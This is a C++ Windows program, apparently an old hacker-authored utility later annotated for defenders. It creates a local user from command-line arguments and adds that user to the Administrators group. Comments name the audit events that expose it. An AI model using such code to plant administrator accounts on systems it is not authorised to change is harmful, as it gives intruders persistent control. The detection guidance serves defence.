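// Code by Pnig0s1992
// Date:2012,3,17
//
// Creates a local account with NetUserAdd and then adds it to the local
// "Administrators" group with NetLocalGroupAddMembers.
//
// Build: MSVC, as C++ (new[]/delete[] are used), with UNICODE defined --
// TCHAR literals such as SE_MACHINE_ACCOUNT_NAME are stored in wchar_t buffers.
//
// Defender notes:
//  * The password is read from argv, so it is part of the process command
//    line: visible to process-listing tools and captured by process-creation
//    auditing when command-line logging is enabled (Security event 4688,
//    Sysmon event 1).
//  * With account-management auditing enabled, the two Net* calls surface as
//    Security event 4720 (user account created) and 4732 (member added to a
//    security-enabled local group). A 4720 followed shortly by a 4732 for
//    Administrators, outside a known provisioning workflow, is worth alerting on.
#include <stdio.h>
#include <Windows.h>
#include <lm.h>
#pragma comment(lib,"Netapi32.lib")

int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);
BOOL ImprovePriv(LPWSTR name);

// Converts an ANSI (CP_ACP) string to a new[]-allocated wide string.
// Returns NULL on failure; on success *pcchOut receives the buffer length in
// wchar_t units, terminator included. The caller owns the buffer (delete[]).
static wchar_t *AnsiToWide(const char *lpSrc,int *pcchOut)
{
    // First call only measures; with cbMultiByte == -1 the count includes the NUL.
    int cch = MultiByteToWideChar(CP_ACP,0,lpSrc,-1,NULL,0);
    if(cch <= 0)
    {
        return NULL;
    }

    wchar_t *lpDst = new wchar_t[cch];
    if(!MultiByteToWideChar(CP_ACP,0,lpSrc,-1,lpDst,cch))
    {
        delete[] lpDst;
        return NULL;
    }

    *pcchOut = cch;
    return lpDst;
}

// Entry point: argv[1] = user name, argv[2] = password.
// Returns -1 on a usage error, a failed privilege step or a failed argument
// conversion; otherwise 0, whether or not the two Net* calls succeeded
// (their status is only printed).
int main(INT argc,char * argv[])
{
    // Validate the arguments before touching the process token.
    if(argc < 3)
    {
        printf("\nCode by Pnig0s1992");
        printf("\nUsage:");
        printf("\n\t%s UserName Password",argv[0]);
        printf("\n\tRemark:Default add to Group:Administrators.");
        return -1;
    }

    // Writable copies: the callee signatures take LPWSTR, and binding a string
    // literal to a non-const pointer is ill-formed in conforming C++.
    wchar_t wPrivName[] = SE_MACHINE_ACCOUNT_NAME;
    wchar_t wGroupName[] = L"Administrators";

    // SeMachineAccountPrivilege is the "Add workstations to domain" user right.
    // NOTE(review): nothing in this file shows the Net* calls below depending
    // on it -- confirm whether this step is needed at all.
    if(ImprovePriv(wPrivName))
    {
        printf("Successfully promote priv!");
    }else
    {
        printf("Failed promote priv.");
        return -1;
    }

    int cchName = 0;
    wchar_t *wUserName = AnsiToWide(argv[1],&cchName);
    if(wUserName == NULL)
    {
        // The original did `return false` here, i.e. exit code 0 on failure.
        printf("\nConvert user name failed.(%lu)",GetLastError());
        return -1;
    }

    int cchPass = 0;
    wchar_t *wPassword = AnsiToWide(argv[2],&cchPass);
    if(wPassword == NULL)
    {
        printf("\nConvert password failed.(%lu)",GetLastError());
        delete[] wUserName;
        return -1;
    }

    // LPWSTR rather than LPTSTR: these are wchar_t buffers in every build.
    LPWSTR lpName = wUserName;
    LPWSTR lpPassword = wPassword;
    LPWSTR lpSevName = NULL;            // NULL = local computer

    AddUser(lpName,lpPassword,lpSevName);
    SetGroup(lpName,lpSevName,wGroupName);

    // Wipe the converted password before releasing it. The copy in argv[2] /
    // the process command line is outside this program's control.
    SecureZeroMemory(wPassword,(SIZE_T)cchPass * sizeof(wchar_t));
    delete[] wPassword;
    delete[] wUserName;
    return 0;
}

// Asks for the named privilege to be enabled in the current process token.
// Returns FALSE if the token cannot be opened, the privilege name cannot be
// resolved, or AdjustTokenPrivileges itself fails; TRUE otherwise.
//
// NOTE(review): AdjustTokenPrivileges returns nonzero even when the token
// does not hold the privilege; GetLastError() == ERROR_NOT_ALL_ASSIGNED is
// the only indication. TRUE from this function therefore means "the request
// was accepted", not "the privilege is now enabled". The return semantics are
// left as the author wrote them because main() treats FALSE as fatal.
BOOL ImprovePriv(LPWSTR name)
{
    HANDLE hToken = NULL;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
    {
        printf("\nGet process token failed.(%lu)",GetLastError());
        return FALSE;
    }

    BOOL bDone = FALSE;
    TOKEN_PRIVILEGES tkp;
    ZeroMemory(&tkp,sizeof(tkp));
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))
    {
        printf("\nLookup process priv failed.(%lu)",GetLastError());
    }else if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))
    {
        printf("\nAjust process priv failed.(%lu)",GetLastError());
    }else
    {
        bDone = TRUE;
    }

    // Single exit so the token handle is closed on the failure paths too
    // (the original leaked it whenever Lookup/Adjust failed).
    CloseHandle(hToken);
    return bDone;
}

// Creates the account via NetUserAdd at information level 1.
// lpServerName == NULL targets the local computer. The outcome is printed;
// the function always returns 0.
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)
{
    USER_INFO_1 ui;
    ZeroMemory(&ui,sizeof(ui));         // usri1_password_age was left uninitialised
    ui.usri1_name = lpUsername;
    ui.usri1_password = lpPassword;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;
    ui.usri1_script_path = NULL;

    DWORD dwLevel = 1;
    DWORD dwError = 0;                  // receives the index of a rejected member, unused here
    NET_API_STATUS nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);
    if(nStatus == NERR_Success)
    {
        printf("\nAdd user:%S successfully!",lpUsername);
    }else
    {
        printf("\nAdd user failed:%lu.",nStatus);
    }
    return 0;
}

// Adds lpUsername to the local group lpGroupName via NetLocalGroupAddMembers
// (level 3: the member is identified by name). The outcome is printed; the
// function always returns 0.
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)
{
    LOCALGROUP_MEMBERS_INFO_3 lgui;
    lgui.lgrmi3_domainandname = lpUsername;

    NET_API_STATUS nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);
    if(nStatus == NERR_Success)
    {
        printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);
    }else if(nStatus == NERR_GroupNotFound)
    {
        printf("\nCan't find such a group:%S.",lpGroupName);
    }else
    {
        printf("\nSet GROUP:%S failed.",lpGroupName);
    }
    return 0;
}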